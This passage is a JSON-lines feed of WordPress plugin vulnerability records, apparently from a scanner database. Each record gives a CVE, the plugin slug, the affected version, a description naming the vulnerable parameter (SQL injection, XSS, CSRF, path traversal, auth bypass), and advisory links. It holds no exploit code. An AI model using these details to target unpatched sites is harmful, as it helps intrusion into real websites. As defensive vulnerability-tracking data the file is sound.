administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/index.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/index.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/register.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/register.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/frontend\\\/request\\\/login\\\/validation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/frontend\\\/request\\\/login\\\/validation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288562\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31e518a9-316b-40a4-ada7-317fb2c16766?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31e518a9-316b-40a4-ada7-317fb2c16766?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32306","slug":"audio4-html5","versionImpact":"4.4.6","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Radio Player Shoutcast & Icecast WordPress Plugin allows Blind SQL Injection. This issue affects Radio Player Shoutcast & Icecast WordPress Plugin: from n\/a through 4.4.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/audio4-html5\\\/vulnerability\\\/wordpress-radio-player-shoutcast-icecast-wordpress-plugin-4-4-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/audio4-html5\\\/vulnerability\\\/wordpress-radio-player-shoutcast-icecast-wordpress-plugin-4-4-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4553","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/483ed482-a1d1-44f6-8b99-56e653d3e45f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/483ed482-a1d1-44f6-8b99-56e653d3e45f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2891","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_delete_product function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcca7ade-8b35-4ba1-a8b4-b1e815b025e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcca7ade-8b35-4ba1-a8b4-b1e815b025e3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4945","slug":"woocommerce-jetpack","versionImpact":"7.1.0","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in versions up to, and including, 7.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1035\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1035\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981639a3-63c4-4b3f-827f-4d770bd44806?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981639a3-63c4-4b3f-827f-4d770bd44806?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49162","slug":"bigcommerce","versionImpact":"5.0.6","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n\/a through 5.0.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bigcommerce\\\/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bigcommerce\\\/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0094","slug":"upqode-google-maps","versionImpact":"1.0.5","description":"The UpQode Google Maps WordPress plugin through 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1453471f-164d-4487-a736-8cea086212fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1453471f-164d-4487-a736-8cea086212fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5432","slug":"lifeline-donation","versionImpact":"1.2.6","description":"The Lifeline Donation plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.6. This is due to insufficient verification on the user being supplied during the checkout through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e24da0c-13d2-4a3d-b918-0d28e3341d88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e24da0c-13d2-4a3d-b918-0d28e3341d88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/includes\\\/class-lifeline-donation.php?rev=2575844#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/includes\\\/class-lifeline-donation.php?rev=2575844#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/vendor\\\/webinane\\\/webinane-commerce\\\/includes\\\/Classes\\\/Checkout.php?rev=2490935#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/vendor\\\/webinane\\\/webinane-commerce\\\/includes\\\/Classes\\\/Checkout.php?rev=2490935#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12262","slug":"ebook-store","versionImpact":"5.8001","description":"The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'step' parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ebook-store\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ebook-store\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8a13e3-f6f5-4673-b223-95eb11465756?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8a13e3-f6f5-4673-b223-95eb11465756?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12067","slug":"wp-travel","versionImpact":"10.0.0","description":"The WP Travel \u2013 Ultimate Travel Booking System, Tour Management Engine plugin for WordPress is vulnerable to SQL Injection via the 'booking_itinerary' parameter of the 'wptravel_get_booking_data' function in all versions up to, and including, 10.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e0f38db-84bb-4ba9-9068-40937e78010d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e0f38db-84bb-4ba9-9068-40937e78010d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0822","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.2 via the fileID Parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9b0eba-5d2b-427c-a199-88bf96c26f5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9b0eba-5d2b-427c-a199-88bf96c26f5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2025","slug":"give","versionImpact":"3.22.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the give_reports_earnings() function in all versions up to, and including, 3.22.0. This makes it possible for unauthenticated attackers to disclose sensitive information included within earnings reports.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/reports\\\/reports.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/reports\\\/reports.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252319\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252319\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40595943-121d-4492-a0ed-f2de1bd99fda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40595943-121d-4492-a0ed-f2de1bd99fda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3432","slug":"aawp-obfuscator","versionImpact":"1.0","description":"The AAWP Obfuscator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-aawp-web' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aawp-obfuscator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aawp-obfuscator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b1b899-37a2-44fd-b961-5e6175e0417f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b1b899-37a2-44fd-b961-5e6175e0417f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32295","slug":"salon-booking-plugin-pro-cc","versionImpact":"10.10.2","description":"Missing Authorization vulnerability in wordpresschef Salon Booking Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Salon Booking Pro: from n\/a through 10.10.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salon-booking-plugin-pro-cc\\\/vulnerability\\\/wordpress-salon-booking-wordpress-plugin-10-10-2-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salon-booking-plugin-pro-cc\\\/vulnerability\\\/wordpress-salon-booking-wordpress-plugin-10-10-2-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4552","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/307b0fe4-39de-4fbb-8bb0-f7f15ec6ef52\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/307b0fe4-39de-4fbb-8bb0-f7f15ec6ef52\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2767","slug":"wp-file-upload","versionImpact":"4.19.1","description":"The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.19.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23334d94-e5b8-4c88-8765-02ad19e17248?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23334d94-e5b8-4c88-8765-02ad19e17248?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4414","slug":"woocommerce-abandoned-cart","versionImpact":"5.8.5","description":"The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.8.5. This is due to missing or incorrect nonce validation on the wcal_preview_emails() function. This makes it possible for unauthenticated attackers to generate email preview templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5d87d2-f3cb-4926-9cbf-acdbe9169f64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5d87d2-f3cb-4926-9cbf-acdbe9169f64?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473720\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473720\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4944","slug":"awesome-weather","versionImpact":"3.0.2","description":"The Awesome Weather Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'awesome-weather' shortcode in versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L133\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf77988-370b-437f-83a0-18a147e3e087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf77988-370b-437f-83a0-18a147e3e087?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48288","slug":"jobwp","versionImpact":"2.1","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin \u2013 JobWP.This issue affects WordPress Job Board and Recruitment Plugin \u2013 JobWP: from n\/a through 2.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-jobwp-plugin-2-1-sensitive-data-exposure-on-resume-files-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-jobwp-plugin-2-1-sensitive-data-exposure-on-resume-files-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4742","slug":"youzify","versionImpact":"1.2.5","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the order_by shortcode attribute in all versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08bd24ca-eec6-4b62-af49-192496e65a5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08bd24ca-eec6-4b62-af49-192496e65a5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/functions\\\/youzify-account-verification-functions.php#L294\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/functions\\\/youzify-account-verification-functions.php#L294\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4643","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.1","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018end_redirect_link\u2019 parameter in versions up to, and including, 5.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f281ef5-bb2e-42f9-be51-6f7bd3069f59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f281ef5-bb2e-42f9-be51-6f7bd3069f59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/countdown\\\/widgets\\\/countdown.php#L2501\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/countdown\\\/widgets\\\/countdown.php#L2501\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11891","slug":"perfect-font-awesome-integration","versionImpact":"2.3","description":"The Perfect Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pfai' shortcode in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 